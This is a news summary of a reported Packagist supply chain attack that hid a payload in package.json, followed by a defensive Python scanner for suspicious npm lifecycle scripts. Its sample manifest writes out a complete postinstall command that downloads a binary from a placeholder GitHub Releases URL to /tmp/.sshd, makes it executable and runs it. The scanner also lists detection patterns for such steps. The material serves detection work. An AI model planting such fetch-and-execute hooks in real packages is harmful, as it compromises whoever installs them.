A coordinated supply chain attack has affected eight Packagist packages by hiding malicious code in package.json (the npm manifest) rather than composer.json (the Composer manifest), so that review focused on the PHP dependency files missed it. The payload attempts to download a Linux binary from GitHub Releases and run it during install or build workflows, and traces of it were found across hundreds of GitHub files. #Packagist #Composer #packagejson #GitHubReleases #gvfsd-network
Key points
- Eight Packagist packages were impacted by a coordinated supply chain attack.
- The malicious code was placed in package.json, not composer.json, to bypass typical PHP dependency checks.
- The payload tried to download a Linux binary from a GitHub Releases URL and execute it from /tmp/.sshd.
- The affected packages were removed from Packagist after discovery.
- References to the same payload were found in 777 GitHub files, including GitHub Actions workflows.
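As an added defensive example (not code from the article or from the affected packages), a scanner that walks a checkout or Composer vendor tree, parses every package.json it finds, and flags lifecycle script entries showing the behaviour described above: a GitHub Releases download, a hidden file under /tmp, a chmod +x. It assumes the payload is invoked from the manifest's scripts field; the indicator patterns, sample manifest, org and URL are constructed placeholders, not the real ones.

```python
import json
import re
from pathlib import Path
# Indicators assumed for this example, modelled on the reported behaviour: a binary
# fetched from GitHub Releases, dropped as a hidden file under /tmp and executed.
SUSPICIOUS_PATTERNS = [
    (r"https?://github\.com/[^\s\"']+/releases/download/", "download from GitHub Releases"),
    (r"\b(curl|wget)\b", "network fetch inside a lifecycle script"),
    (r"/tmp/\.[A-Za-z0-9_]+", "hidden file under /tmp"),
    (r"\bchmod\s+\+x\b", "marks a downloaded file executable"),
]
# npm lifecycle hooks that run on install, plus "build", which CI workflows invoke.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublishOnly", "build"}

def scan_manifest(manifest_text, path="package.json"):
    """Return one finding per suspicious pattern found in a lifecycle script entry."""
    try:
        data = json.loads(manifest_text)
    except json.JSONDecodeError as exc:
        # An unparseable manifest is itself worth a look rather than a silent skip.
        return [{"path": path, "hook": None, "reason": f"unparseable JSON: {exc.msg}"}]
    scripts = data.get("scripts") if isinstance(data, dict) else None
    if not isinstance(scripts, dict):
        return []
    findings = []
    for hook, command in scripts.items():
        if hook not in LIFECYCLE_HOOKS or not isinstance(command, str):
            continue
        for pattern, reason in SUSPICIOUS_PATTERNS:
            if re.search(pattern, command):
                findings.append({"path": path, "hook": hook, "reason": reason})
    return findings

def scan_tree(root):
    """Scan every package.json below root (e.g. a Composer vendor/ directory)."""
    results = []
    for manifest in Path(root).rglob("package.json"):
        if "node_modules" in manifest.parts:
            continue
        results.extend(scan_manifest(manifest.read_text(encoding="utf-8", errors="replace"), str(manifest)))
    return results

# Constructed sample manifest; the org, repo and URL are placeholders, not the real ones.
SAMPLE_MANIFEST = json.dumps({"name": "example-assets", "scripts": {
    "build": "vite build",
    "postinstall": "curl -sL https://github.com/EXAMPLE-ORG/EXAMPLE-REPO/releases/download/v1/agent "
                   "-o /tmp/.sshd && chmod +x /tmp/.sshd && /tmp/.sshd"}})

if __name__ == "__main__":
    for f in scan_manifest(SAMPLE_MANIFEST):
        print(f"{f['path']}: scripts.{f['hook']}: {f['reason']}")
```

Run it against vendor/ after `composer install` in CI; any finding in a PHP package that should not need an npm lifecycle script at all is worth a manual look.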
Read More: https://thehackernews.com/2026/05/packagist-supply-chain-attack-infects-8.html